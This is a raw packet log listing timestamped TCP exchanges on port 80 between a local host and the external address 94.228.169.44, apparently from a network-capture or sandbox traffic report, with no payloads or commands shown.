Sep 1, 2024 18:27:46.241935015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241945982 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241956949 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.241971970 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.242001057 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.245491028 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245507002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245553970 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.245620966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245639086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245650053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245692015 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.245778084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245789051 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245804071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.245825052 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.245846033 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.250492096 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250622988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250633955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250778913 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250790119 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250801086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250804901 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.250813007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.250859022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.254350901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254360914 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254375935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254407883 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.254430056 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.254461050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254472017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254518032 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.254574060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254611015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254621983 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.254652977 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.260044098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260080099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260097980 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.260118961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260155916 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.260231018 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260247946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260284901 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.260423899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260441065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260457039 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.260474920 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.266237020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266290903 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.266338110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266349077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266391039 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.266474009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266529083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266541958 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266554117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.266568899 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.266591072 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.296339035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296402931 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296407938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296530008 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.296571016 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296581030 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296591043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296602964 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296617985 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.296641111 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.296891928 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.296937943 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.297051907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297063112 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297095060 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.297240019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297250986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297261000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297271967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297287941 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.297301054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.297555923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297669888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297681093 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297715902 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.297879934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297889948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297904968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297916889 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.297925949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.297945023 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.298450947 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.298492908 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.298515081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.298526049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.298557997 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.298719883 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.298731089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.298739910 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.298763990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.307491064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307524920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307534933 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307554960 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.307578087 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.307746887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307756901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307768106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307777882 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.307792902 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.307812929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.308109045 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308120966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308156013 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.308300972 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308311939 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308321953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308346987 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.308583021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308593988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.308620930 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.310739994 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.310782909 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.310796976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.310807943 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.310838938 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.311014891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.311026096 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.311036110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.311048031 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.311059952 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.311077118 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.318089962 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318124056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318135023 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318166018 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.318348885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318360090 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318378925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318388939 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.318392038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.318413973 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.321043015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321110010 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.321132898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321144104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321186066 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.321320057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321331024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321341038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321352005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.321367025 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.321397066 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.326456070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.326527119 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.326539040 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.326567888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.326736927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.326747894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.326757908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.326775074 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.328305960 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.330419064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330465078 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.330485106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330497026 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330532074 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.330645084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330692053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330703974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330714941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.330728054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.330753088 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.339905024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.339950085 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.339960098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.339991093 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.340161085 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340173006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340183020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340193033 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340213060 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.340235949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.340537071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340548038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340570927 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.340725899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340737104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340748072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.340775967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.340792894 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.340987921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.341000080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.341033936 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.342912912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.342993975 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.343004942 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.343030930 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.343174934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.343185902 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.343210936 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.343333006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.343344927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.343368053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.354757071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.354816914 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.354820967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.354825974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.354984999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355006933 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.355042934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355079889 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.355161905 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355173111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355181932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355201006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.355349064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355387926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.355451107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355460882 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355505943 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.355583906 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355675936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355720997 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.355797052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355808020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355815887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.355834961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.365520954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365545988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365571022 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365586996 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.365608931 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.365705013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365720987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365732908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365757942 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.365978003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.365988016 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.366043091 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.373250008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373301983 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.373328924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373338938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373380899 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.373440981 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373564005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373575926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373609066 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.373730898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373740911 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.373778105 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.378633976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.378701925 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.378715038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.378726006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.378755093 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.378993034 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.379004002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.379014015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.379025936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.379049063 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.379072905 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.383343935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383438110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383449078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383492947 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.383635044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383645058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383656025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383666039 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.383677006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.383687019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395006895 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395056009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395070076 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395078897 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395123005 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395224094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395235062 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395245075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395270109 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395420074 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395462036 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395539999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395551920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395586967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395674944 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395690918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395772934 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.395832062 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395942926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395953894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.395991087 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.396087885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.396097898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.396133900 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.399482965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399492025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399529934 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.399544001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399583101 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.399655104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399665117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399702072 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.399776936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399899006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399912119 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.399946928 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.400007963 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.400054932 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.407968044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408032894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408049107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408071995 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.408257008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408267975 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408282042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408293009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.408293009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.408319950 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.409190893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409235954 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.409282923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409293890 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409329891 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.409434080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409447908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409487009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.409596920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409607887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.409650087 CEST	56160	80	192.168.2.4	94.228.169.44
